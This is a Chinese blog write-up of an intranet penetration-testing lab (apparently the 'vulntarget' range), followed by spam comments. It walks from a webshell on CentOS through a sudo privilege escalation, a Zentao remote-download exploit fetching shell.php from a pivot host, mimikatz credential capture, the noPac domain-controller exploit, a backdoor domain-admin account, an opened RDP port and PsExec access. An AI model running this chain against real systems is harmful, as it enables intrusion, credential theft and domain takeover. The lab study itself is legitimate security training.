• 环境搭建


    见参考文献1。

  • Centos7


    web 在 81 端口,直接 admin/admin123 进后台,后台下一个可以改代码的插件。
    image-20220414214149381
    首次使用,设置密码后可以直接修改后台文件,写个?进去。
    连上后发现 disable_functions ban 了很多函数(bt 默认的),用蚁剑自带的插件绕一下,拿到 shell 之后用 msf 传个?。
    之后可以用 sudo 的 CVE-2021-3156 提权
    image-20220414222053505
    image-20220414222216786
    在 msf 中已经集成在 exploit/linux/local/sudo_baron_samedit 中
    image-20220414223020025
    下一层 ip 是 10.0.20.0/24,用 Neo-reGeorg 挂个正向代理

  • Win10


    (这里 win10 的网卡改成了 10.0.10.140),访问 8080 的 web 端口,发现禅道 cms。直接 admin / Admin123 登进后台,版本 12.4.2,有洞,可以远程下载文件到主机。工具:https://github.com/wikiZ/Zentao-RCE
    但 win10 不出网,无法访问攻击机,但 centos 中是有 python 的,可以手动在 centos 上写?并下载。
    python -c 'import pty; pty.spawn("/bin/bash")' // 开启交互模式
python -m SimpleHTTPServer 9998

base64:HTTP://10.0.20.30:9998/shell.php

http://10.0.20.140:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6OTk5OC9zaGVsbC5waHA=

    image-20220415162429823
    直接访问是 500,但可以用蚁剑链接,接着就可以传 msf 的?上去。
    tasklist 发现有火绒,需要做一下免杀,这里做个 uuid 免杀就行,具体操作看免杀初探那篇文章。
    (我应该不是最后一个知道添加路由后可以直接反弹跳板机的吧)
    run post/multi/manage/autoroute

    image-20220415204105527
    拿到的是一个 IIS 的低权限,尝试提权
    run post/multi/recon/local_exploit_suggester

    或者手动看缺少的补丁(想起来主机是 win10,大概没什么用了):
    systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt

    最后还是直接 getsystem 提权了(其实用到了 CVE-2021-34481,之后补分析)
    image-20220415210859390

  • Windows Server 2016


    win10 尝试抓密码(xs 根本抓不到)
    load kiwi
creds_all

    操作可参考抓密码那篇文章 http://moonflower.fun/index.php/2022/03/01/291/
    这里用 mimikatz 的 ssp 临时注入,只要不重启,就会记录密码
     kiwi_cmd misc::memssp

    image-20220415214643951
    拿到账户密码之后尝试用 CVE-2021-42287/CVE-2021-42278 拿域控权限(分析之后补),没打补丁全版本都能打(靶机杀器)
    本地没有 .NET 环境,c# 版本的 exp 用不了,这里用 kali 挂两层代理打
    image-20220415225902049
    工具地址:https://github.com/Ridter/noPac
    msf 定位域控:
     run post/windows/gather/enum_domain

    exp 直接打(可能需要多打几次):
    proxychains4 python3 sam_the_admin.py "vulntarget.com/win101:admin#123" -dc-ip 10.0.10.100 -shell

    image-20220416171146959
    做一下维权,创建一个域管账号:
    net user admin admin#123 /add /domain
net group "Domain Admins" admin /add /domain

    修改防火墙策略,打开 3389 端口
    netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

    用 PsExec 链接上:
    PsExec64.exe \\10.0.10.100 -u vulntarget\admin -p admin#123 -s cmd.exe -accepteula

  • 参考文献


 

标签: none

已有 3 条评论

  1. yrcpjwpcml yrcpjwpcml

    想想你的文章写的特别好https://www.237fa.com/

    回复
  2. qsbqtoocki qsbqtoocki

    《大事》剧情片高清在线免费观看:https://www.jgz518.com/xingkong/65368.html

    回复
  3. kjzttqyulo kjzttqyulo

    清风传奇180战神复古新体验:https://501h.com/yuanshi/2761.html

    回复

添加新评论